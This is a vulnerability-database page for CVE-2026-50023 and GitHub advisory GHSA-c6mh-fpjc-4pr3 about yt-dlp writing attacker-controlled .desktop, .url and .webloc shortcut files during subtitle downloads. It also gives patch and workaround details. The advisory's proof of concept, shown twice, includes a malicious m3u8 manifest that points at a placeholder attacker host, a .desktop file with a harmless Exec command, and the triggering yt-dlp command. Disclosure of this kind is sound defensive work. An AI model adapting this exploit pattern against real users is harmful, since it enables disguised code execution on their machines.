Vulnerability-Lookup

CVE-2026-50023 (GCVE-0-2026-50023)

Vulnerability from cvelistv5 – Published: 2026-06-23 16:08 – Updated: 2026-06-23 16:08

Title

yt-dlp: Dangerous file type creation via insufficient filename sanitization (Bypass of CVE-2024-38519)

Summary

yt-dlp is a command-line audio/video downloader. Prior to 2026.06.09, a vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as .desktop, .url, .webloc) to the user's filesystem, bypassing the remediation for CVE-2024-38519. The allowlist explicitly included the unsafe extensions .desktop, .url, and .webloc so that the functionality of the --write-link option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download. This vulnerability is fixed in 2026.06.09.

Severity

8.3 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CWE

CWE-641 - Improper Restriction of Names for Files and Other Resources

Assigner

GitHub_M

References

4 references

URL	Tags
https://github.com/yt-dlp/yt-dlp/security/advisor…	x_refsource_CONFIRM
https://github.com/yt-dlp/yt-dlp/commit/e578e265f…	x_refsource_MISC
https://github.com/yt-dlp/yt-dlp-nightly-builds/r…	x_refsource_MISC
https://github.com/yt-dlp/yt-dlp/releases/tag/202…	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
yt-dlp	yt-dlp	Affected: < 2026.06.09

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "yt-dlp",
          "vendor": "yt-dlp",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2026.06.09"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "yt-dlp is a command-line audio/video downloader. Prior to 2026.06.09, a vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as .desktop, .url, .webloc) to the user\u0027s filesystem, bypassing the remediation for CVE-2024-38519. The allowlist explicitly included the unsafe extensions .desktop, .url, and .webloc so that the functionality of the --write-link option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download. This vulnerability is fixed in 2026.06.09."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-641",
              "description": "CWE-641: Improper Restriction of Names for Files and Other Resources",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-23T16:08:43.003Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/yt-dlp/yt-dlp/security/advisories/GHSA-c6mh-fpjc-4pr3",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/yt-dlp/yt-dlp/security/advisories/GHSA-c6mh-fpjc-4pr3"
        },
        {
          "name": "https://github.com/yt-dlp/yt-dlp/commit/e578e265f7c6ca94a74b30e0d8d6196a4d19fb6a",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/yt-dlp/yt-dlp/commit/e578e265f7c6ca94a74b30e0d8d6196a4d19fb6a"
        },
        {
          "name": "https://github.com/yt-dlp/yt-dlp-nightly-builds/releases/tag/2026.06.09.230517",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/yt-dlp/yt-dlp-nightly-builds/releases/tag/2026.06.09.230517"
        },
        {
          "name": "https://github.com/yt-dlp/yt-dlp/releases/tag/2026.06.09",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/yt-dlp/yt-dlp/releases/tag/2026.06.09"
        }
      ],
      "source": {
        "advisory": "GHSA-c6mh-fpjc-4pr3",
        "discovery": "UNKNOWN"
      },
      "title": "yt-dlp: Dangerous file type creation via insufficient filename sanitization (Bypass of CVE-2024-38519)"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-50023",
    "datePublished": "2026-06-23T16:08:43.003Z",
    "dateReserved": "2026-06-02T22:46:02.579Z",
    "dateUpdated": "2026-06-23T16:08:43.003Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-50023",
      "date": "2026-06-14",
      "epss": "0.00118",
      "percentile": "0.30405"
    }
  }
}

GHSA-C6MH-FPJC-4PR3

Vulnerability from github – Published: 2026-06-16 20:59 – Updated: 2026-06-16 20:59

Summary

yt-dlp: Dangerous file type creation via insufficient filename sanitization (Bypass of CVE-2024-38519)

Details

Summary

A vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as .desktop, .url, .webloc) to the user's filesystem, bypassing the remediation for CVE-2024-38519.

Details

The fix for CVE-2024-38519 enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as .exe or .sh) during file downloads. However, this allowlist explicitly included the unsafe extensions .desktop, .url, and .webloc so that the functionality of the --write-link option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download.

Numerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an EXT-X-MEDIA:TYPE=SUBTITLES tag with a malicious URI (e.g., URI="http://attacker/x.desktop"), which would result in yt-dlp writing the attacker-controlled content to a file with a .desktop extension if the user had passed the --write-subs option.

Writing OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments.

While these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a "subtitles"/media file, leading to a phishing attack or arbitrary code execution.

Proof of Concept

1. Start a malicious server: Host a malicious master.m3u8 manifest that points to malicious subtitle payloads:

#EXTM3U
#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID="subs",NAME="English",URI="http://attacker/payload.desktop",LANGUAGE="en"

And host the payload.desktop file with malicious content:

[Desktop Entry]
Type=Application
Exec=sh -c "touch /tmp/ytdlp_pwned_$(id -u)"
Name=Subtitle

2. Trigger the download: In this case, the generic extractor triggers the exploit if the --write-subs option is used:

yt-dlp --write-subs -o "MyVideo.%(ext)s" "http://attacker/master.m3u8"

Result: yt-dlp writes MyVideo.en.desktop to disk, containing the attacker payload.

Patches

yt-dlp version 2026.06.09 fixes this issue by removing .url, .desktop and .webloc from the global file extension allowlist, and by only allowing those file types to be written from within the context of the --write-link options' functionality.

Workarounds

It is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.

Users who are not able to upgrade should do ALL of the following:

Only pass fully trusted input URLs to yt-dlp
Do not use the --write-subs, --write-auto-subs, --embed-subs, --write-thumbnail, --write-all-thumbnails, or --embed-thumbnail options
Use --format - to interactively select download formats and validate their file extensions

Severity

8.3 (High)


                  
                    CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 2026.06.09"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "yt-dlp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.6.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-50023"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-641"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T20:59:42Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nA vulnerability exists in yt-dlp that allows a remote attacker to write arbitrary OS-shortcut files (such as `.desktop`, `.url`, `.webloc`) to the user\u0027s filesystem, bypassing the remediation for `CVE-2024-38519`. \n\n### Details\nThe fix for `CVE-2024-38519` enforced an allowlist for file extensions, in order to prevent writing files with unsafe extensions (such as `.exe` or `.sh`) during file downloads. However, this allowlist explicitly included the unsafe extensions `.desktop`, `.url`, and `.webloc` so that the functionality of the `--write-link` option (and its variants) could be preserved. These allowlist inclusions can be exploited by an attacker to write malicious OS-shortcut files in the context of a media or subtitles download.\n\nNumerous yt-dlp extractors derive the downloaded media or subtitles file extension from a potentially attacker-controlled source. An attacker could craft an m3u8 file that contains an `EXT-X-MEDIA:TYPE=SUBTITLES` tag with a malicious URI (e.g., `URI=\"http://attacker/x.desktop\"`), which would result in yt-dlp writing the attacker-controlled content to a file with a `.desktop` extension if the user had passed the `--write-subs` option.\n\nWriting OS-shortcut files next to downloaded videos provides a high-probability social engineering vector. The extension of the shortcut file is often hidden from the user, e.g. on Windows by default or on many Linux desktop environments. \n\nWhile these shortcut files are typically used to point to web locations via URLs, they can also contain shell commands or point to remote executables. The user may be deceived into opening the malicious shortcut disguised as a \"subtitles\"/media file, leading to a phishing attack or arbitrary code execution.\n\n### Proof of Concept\n**1. Start a malicious server:**\nHost a malicious `master.m3u8` manifest that points to malicious subtitle payloads:\n```m3u8\n#EXTM3U\n#EXT-X-MEDIA:TYPE=SUBTITLES,GROUP-ID=\"subs\",NAME=\"English\",URI=\"http://attacker/payload.desktop\",LANGUAGE=\"en\"\n```\nAnd host the `payload.desktop` file with malicious content:\n```ini\n[Desktop Entry]\nType=Application\nExec=sh -c \"touch /tmp/ytdlp_pwned_$(id -u)\"\nName=Subtitle\n```\n\n**2. Trigger the download:**\nIn this case, the generic extractor triggers the exploit if the `--write-subs` option is used:\n```bash\nyt-dlp --write-subs -o \"MyVideo.%(ext)s\" \"http://attacker/master.m3u8\"\n```\n\n**Result:** yt-dlp writes `MyVideo.en.desktop` to disk, containing the attacker payload.\n\n### Patches\nyt-dlp version 2026.06.09 fixes this issue by removing `.url`, `.desktop` and `.webloc` from the global file extension allowlist, and by only allowing those file types to be written from within the context of the `--write-link` options\u0027 functionality.\n\n### Workarounds\nIt is recommended to upgrade yt-dlp to version 2026.06.09 as soon as possible.\n\nUsers who are not able to upgrade should do ALL of the following:\n\n- Only pass fully **trusted** input URLs to yt-dlp\n- Do not use the `--write-subs`, `--write-auto-subs`, `--embed-subs`, `--write-thumbnail`, `--write-all-thumbnails`, or `--embed-thumbnail` options\n- Use `--format -` to interactively select download formats and validate their file extensions",
  "id": "GHSA-c6mh-fpjc-4pr3",
  "modified": "2026-06-16T20:59:42Z",
  "published": "2026-06-16T20:59:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/yt-dlp/yt-dlp/security/advisories/GHSA-c6mh-fpjc-4pr3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-38519"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yt-dlp/yt-dlp/commit/e578e265f7c6ca94a74b30e0d8d6196a4d19fb6a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/yt-dlp/yt-dlp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yt-dlp/yt-dlp-nightly-builds/releases/tag/2026.06.09.230517"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yt-dlp/yt-dlp/releases/tag/2026.06.09"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "yt-dlp: Dangerous file type creation via insufficient filename sanitization (Bypass of CVE-2024-38519)"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-50023 (GCVE-0-2026-50023)

GHSA-C6MH-FPJC-4PR3

Summary

Details

Proof of Concept

Patches

Workarounds

Tags

Sightings

Nomenclature